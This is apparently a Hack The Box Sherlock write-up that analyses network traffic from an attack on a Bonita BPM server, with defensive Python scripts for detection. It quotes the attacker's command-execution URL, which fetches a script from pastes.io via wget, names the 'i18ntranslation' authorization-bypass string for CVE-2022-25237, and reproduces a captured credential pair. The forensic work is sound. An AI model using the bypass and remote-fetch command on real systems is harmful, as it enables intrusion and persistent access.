Meerkat Write Up — Hack The Box

Hi, this time I want to share how I solved the Meerkat Sherlock from Hack The Box. I hope this write-up helps you understand how to work through the lab.

TLDR: Meerkat is one of the Hack The Box Sherlock labs. You are given the network traffic of an incident as a pcap file and have to find the answer to each question in the HTB portal. If you want to get to the Meerkat page, just click this link.

1. We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running?

The flag is the name of the running application. Web applications often listen on non-standard ports, so I started with the Wireshark filter http && tcp.port == 8080 to show only the HTTP traffic on port 8080.

The filtered traffic contains a lot of HTTP packets whose info column shows “login” requests to a /bonita path. One of those packets shows that Bonita exposes a portal to log in to.

A quick Google search shows that the Bonita portal is the Bonitasoft login page for the Bonita application. Bonitasoft is the software company behind the Bonita platform, a business process management (BPM) product.

Flag : BonitaSoft.

2. We believe the attacker may have used a subset of the brute forcing attack category — what is the name of the attack carried out?

The HTTP traffic shows a large number of login requests to the Bonita application.

If you look at the HTML Form URL Encoded values of several packets whose info column reads “POST /bonita/loginservice HTTP/1.1 (application/x-www-form-urlencoded)”, you can see the attacker trying many different credentials, but always with a username on the same mail domain, i.e. “forela.co.uk”.

Each attempt is a different username with its own password, tried once and then abandoned. That is the shape of a credential list leaked from other sites being replayed against forela.co.uk in the hope that people reused their passwords. This variant of brute forcing is called Credential Stuffing, as opposed to a classic brute force (one user, many passwords) or password spraying (one password across many users).

Flag : Credential Stuffing.

3. Does the vulnerability exploited have a CVE assigned — and if so, which one?

After the attacker successfully logged in, the pcap shows them trying to upload a file through the pageUpload API URL.

Following the TCP stream of that request shows that the upload is a zip file named “rce_api_extension.zip”.

The attacker then calls the uploaded extension with the command “whoami”, so we can conclude they obtained remote command execution on the target host.

In other words, the attacker abused the API to get the upload past the authorization check and then used the rce_api_extension.zip extension to run commands on the target remotely.

Searching for this shows that Bonitasoft had an authorization bypass and RCE vulnerability: an overly broad exclude pattern in the REST API authorization filter let a user append a string to an API URL and reach privileged API endpoints. Abusing those privileged APIs leads to Remote Code Execution (RCE) on the server.

Flag : CVE-2022-25237

4. Which string was appended to the API URL path to bypass the authorization filter by the attacker’s exploit?

The API URL the attacker used for the file upload is the one that bypasses the authorization filter.

It carries an extra string, “i18ntranslation”, in the URL path. Referring to CVE-2022-25237, that string matches the exclude pattern of the authorization filter, so any request containing it skips the authorization check.

Flag : i18ntranslation

5. How many combinations of usernames and passwords were used in the credential stuffing attack?

Filtering on HTTP POST requests shows a long list of login attempts.

Click on one of the packets and expand the HTML Form URL Encoded section. It shows the username and password values used for that login attempt.

To compare the usernames quickly, right-click the username value and choose Apply as Column.

A column with the username values appears; here I looked for the ones that differ. 55 packets carry distinct username and password combinations.

Adding the last credential combination in the list gives a total of 56. Note that this counts distinct username and password pairs, not POST packets: the pair that worked is sent more than once.

Flag : 56

6. Which username and password combination was successful?

In the values shown by the previous HTTP POST filter, one pair of credentials is used repeatedly, unlike the other combinations, which each appear once. So this is the pair that worked and ultimately let the attacker log in to the system.

If you look at the TCP stream that includes the pageUpload API URL, you can also find the username and password combination the attacker successfully logged in with.

Flag : seb.broom@forela.co.uk:g0vernm3nt
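The counting and reuse reasoning from questions 2, 5 and 6 can be scripted rather than eyeballed in Wireshark. The Python below is an added example and not part of the original write-up: the login bodies it works on are constructed to mimic the shape of the loginservice POSTs (on the real capture you would dump them with tshark and the http.file_data field), and the thresholds in classify() are my own heuristics, not a standard.

```python
"""Classify a burst of login POSTs and recover the pair that worked.

Added example, not from the original write-up. SAMPLE_BODIES is a constructed
stand-in for the urlencoded bodies of POST /bonita/loginservice, in capture order.
"""
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample data: five leaked-looking pairs, one of which is replayed
# three times once it succeeds (the behaviour observed in the write-up).
SAMPLE_BODIES = [
    "username=alice.smith%40forela.co.uk&password=Summer2021&_l=en",
    "username=bob.jones%40forela.co.uk&password=Password1&_l=en",
    "username=carol.white%40forela.co.uk&password=hunter2&_l=en",
    "username=dave.brown%40forela.co.uk&password=qwerty123&_l=en",
    "username=seb.broom%40forela.co.uk&password=g0vernm3nt&_l=en",
    "username=seb.broom%40forela.co.uk&password=g0vernm3nt&_l=en",
    "username=seb.broom%40forela.co.uk&password=g0vernm3nt&_l=en",
]


def parse_attempts(bodies):
    """Return one (username, password) tuple per POST body, percent-decoded."""
    attempts = []
    for body in bodies:
        form = parse_qs(body, keep_blank_values=True)
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        attempts.append((user, password))
    return attempts


def distinct_pairs(attempts):
    """Question 5 counts distinct pairs, not packets: replays must collapse."""
    return len(set(attempts))


def classify(attempts):
    """Heuristic split of the three 'many failed logins' shapes (assumption:
    these ratios are my own, tune them against your own baseline)."""
    pairs = set(attempts)
    users = {u for u, _ in pairs}
    passwords = {p for _, p in pairs}
    if len(users) == 1:
        return "brute force"            # one account, many passwords
    if len(passwords) * 2 <= len(users):
        return "password spraying"      # few passwords across many accounts
    return "credential stuffing"        # each account with its own password


def username_domains(attempts):
    """The write-up's observation: every username shares one mail domain."""
    return {u.rsplit("@", 1)[-1] for u, _ in attempts if "@" in u}


def likely_success(attempts):
    """Stuffing tries each leaked pair once; the hit is the pair replayed to
    build the session. Returns None if no pair repeats. Confirm against the
    server response in the same TCP stream before treating this as proof."""
    pair, count = Counter(attempts).most_common(1)[0]
    return pair if count > 1 else None


if __name__ == "__main__":
    attempts = parse_attempts(SAMPLE_BODIES)
    print("distinct pairs:", distinct_pairs(attempts))
    print("attack type:", classify(attempts))
    print("domains:", username_domains(attempts))
    print("likely working pair:", likely_success(attempts))
```

The reuse heuristic is a hint, not proof: the definitive signal is the server's reply to each POST in the same stream, which is why the write-up cross-checks the pair against the later pageUpload traffic.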

7. If any, which text sharing site did the attacker utilise?

One of the HTTP packets carries a request to the uploaded extension with the following command:

/bonita/API/extension/rce?p=0&c=1&cmd=wget%20https://pastes.io/raw/bx5gcr0et8

The cmd parameter decodes to wget https://pastes.io/raw/bx5gcr0et8, which fetches a script from pastes.io, a site that hosts text and code pastes.

Flag : pastes.io
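Questions 4 and 7 both come down to spotting a pattern in the request URLs: the bypass token smuggled onto a privileged API path, and commands sent to the dropped extension. The Python below is an added example, not part of the original write-up. The request lines are constructed, except for the extension URL quoted above; the two bypass forms (“;i18ntranslation” as a path parameter and “/../i18ntranslation/” behind a dot-dot segment) follow the CVE-2022-25237 description, but the exact paths used here are illustrative.

```python
"""Triage HTTP request lines from a Bonita capture for two signs of
CVE-2022-25237 exploitation: a privileged API path with the authorization
filter bypass token appended, and commands to an uploaded 'rce' extension.

Added example, not from the original write-up. Request lines are constructed
apart from the wget one quoted in the write-up.
"""
import re
from urllib.parse import parse_qs, urlsplit

BYPASS_TOKEN = "i18ntranslation"
API_PREFIX = re.compile(r"^/bonita/(api|API)/")
EXTENSION_PREFIX = "/bonita/API/extension/"

SAMPLE_REQUESTS = [
    "GET /bonita/portal/homepage HTTP/1.1",
    "POST /bonita/loginservice HTTP/1.1",
    # constructed: bypass token as a path parameter on a privileged endpoint
    "POST /bonita/API/pageUpload;i18ntranslation?action=add HTTP/1.1",
    # constructed: bypass token behind a dot-dot segment
    "POST /bonita/API/portal/page/../i18ntranslation/ HTTP/1.1",
    # from the write-up: command execution through the uploaded extension
    "GET /bonita/API/extension/rce?p=0&c=1&cmd=wget%20https://pastes.io/raw/bx5gcr0et8 HTTP/1.1",
    "GET /bonita/API/extension/rce?p=0&c=1&cmd=whoami HTTP/1.1",
]


def parse_request_line(line):
    """Split 'METHOD target HTTP/x.y' into (method, path, query dict)."""
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)          # urlsplit keeps ';params' inside path
    return method, parts.path, parse_qs(parts.query)


def is_filter_bypass(path):
    """True when the token rides on another resource's path instead of being
    the resource itself (a plain .../API/system/i18ntranslation lookup is the
    legitimate use and is not flagged)."""
    if not API_PREFIX.match(path) or BYPASS_TOKEN not in path:
        return False
    return (";" + BYPASS_TOKEN) in path or ("/../" + BYPASS_TOKEN) in path


def extension_commands(requests):
    """Decode cmd= sent to REST API extensions; returns (extension, command, urls)."""
    found = []
    for line in requests:
        _method, path, query = parse_request_line(line)
        if path.startswith(EXTENSION_PREFIX) and "cmd" in query:
            cmd = query["cmd"][0]     # parse_qs already percent-decodes %20 etc.
            urls = re.findall(r"https?://[^\s'\"]+", cmd)
            found.append((path.rsplit("/", 1)[-1], cmd, urls))
    return found


def external_hosts(requests):
    """Hosts contacted from inside executed commands (question 7)."""
    return sorted({urlsplit(u).hostname for _, _, urls in extension_commands(requests) for u in urls})


def triage(requests):
    bypasses = [parse_request_line(l)[1] for l in requests if is_filter_bypass(parse_request_line(l)[1])]
    return {"bypass_paths": bypasses, "commands": extension_commands(requests)}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_REQUESTS).items():
        print(key, value)
    print("external hosts:", external_hosts(SAMPLE_REQUESTS))
```

On a real capture feed the function the output of tshark with the http.request.line or http.request.uri fields; the token check is deliberately narrow so that legitimate translation lookups do not drown the alert.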

8. Please provide the filename of the public key used by the attacker to gain persistence on our host.

Opening https://pastes.io/raw/bx5gcr0et8 displays the script the attacker fetched.

The script downloads the contents of https://pastes.io/raw/hffgra4unv and appends them to the SSH file “/home/ubuntu/.ssh/authorized_keys”. Opening that second link shows the public key the attacker added so they could SSH in to the system later. The filename asked for is therefore the paste name, hffgra4unv.

Flag : hffgra4unv

9. Can you confirm the file modified by the attacker to gain persistence?

The script at https://pastes.io/raw/bx5gcr0et8 shows that the command targets the SSH key file at:

/home/ubuntu/.ssh/authorized_keys

Flag : /home/ubuntu/.ssh/authorized_keys

10. Can you confirm the MITRE technique ID of this type of persistence mechanism?

For persistence, the attacker downloaded their own SSH public key via pastes.io and appended it to authorized_keys in the user's home folder. In MITRE ATT&CK this is Account Manipulation: SSH Authorized Keys, technique ID T1098.004.

Flag : T1098.004
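The persistence mechanism behind questions 8 to 10 is easy to check for on the host once you know what it looks like: compare authorized_keys with a known-good copy and report any key that was not there before, identified by its fingerprint. The Python below is an added example, not part of the original write-up; the two files and the key blobs are constructed (the blobs are hashes dressed up in OpenSSH wire format, not real keys), and the fingerprint function reproduces the SHA256 form that ssh-keygen -lf prints.

```python
"""Detect T1098.004 (Account Manipulation: SSH Authorized Keys) by diffing an
authorized_keys file against a baseline, keyed by OpenSSH SHA256 fingerprint.

Added example, not from the original write-up. Files and key material below are
constructed; no key from the case is reproduced.
"""
import base64
import hashlib
import struct


def ssh_string(data):
    """OpenSSH wire-format string: 4-byte big-endian length prefix."""
    return struct.pack(">I", len(data)) + data


def fake_ed25519_blob(seed):
    """Constructed public-key blob: type string + 32 bytes derived from the
    seed by hashing. Structurally valid, cryptographically meaningless."""
    key = hashlib.sha256(seed).digest()
    return base64.b64encode(ssh_string(b"ssh-ed25519") + ssh_string(key)).decode()


# Constructed baseline (e.g. from a backup) and the file as found after the
# attacker's script appended one line to it.
BASELINE_FILE = "\n".join([
    "# admin key, issued 2021-09",
    f"ssh-ed25519 {fake_ed25519_blob(b'admin-laptop')} ubuntu@admin-laptop",
])
CURRENT_FILE = BASELINE_FILE + "\n" + f"ssh-ed25519 {fake_ed25519_blob(b'attacker')} attacker@example"


def fingerprint(blob_b64):
    """SHA256 fingerprint in the same form `ssh-keygen -lf` prints."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Return one dict per key line. Leading options (command=..., no-pty, ...)
    are kept; this simple split assumes option values contain no spaces."""
    keys = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        idx = next((i for i, f in enumerate(fields)
                    if f.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(fields):
            continue
        keys.append({
            "options": " ".join(fields[:idx]),
            "type": fields[idx],
            "fingerprint": fingerprint(fields[idx + 1]),
            "comment": " ".join(fields[idx + 2:]),
        })
    return keys


def added_keys(baseline_text, current_text):
    """Keys present now that were not in the baseline, by fingerprint."""
    known = {k["fingerprint"] for k in parse_authorized_keys(baseline_text)}
    return [k for k in parse_authorized_keys(current_text) if k["fingerprint"] not in known]


if __name__ == "__main__":
    for key in added_keys(BASELINE_FILE, CURRENT_FILE):
        print("ADDED", key["type"], key["fingerprint"], key["comment"])
```

Matching on fingerprint rather than on the raw line means a renamed comment or added option does not hide a key, and the fingerprints can be compared directly with what ssh-keygen reports on the live host.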
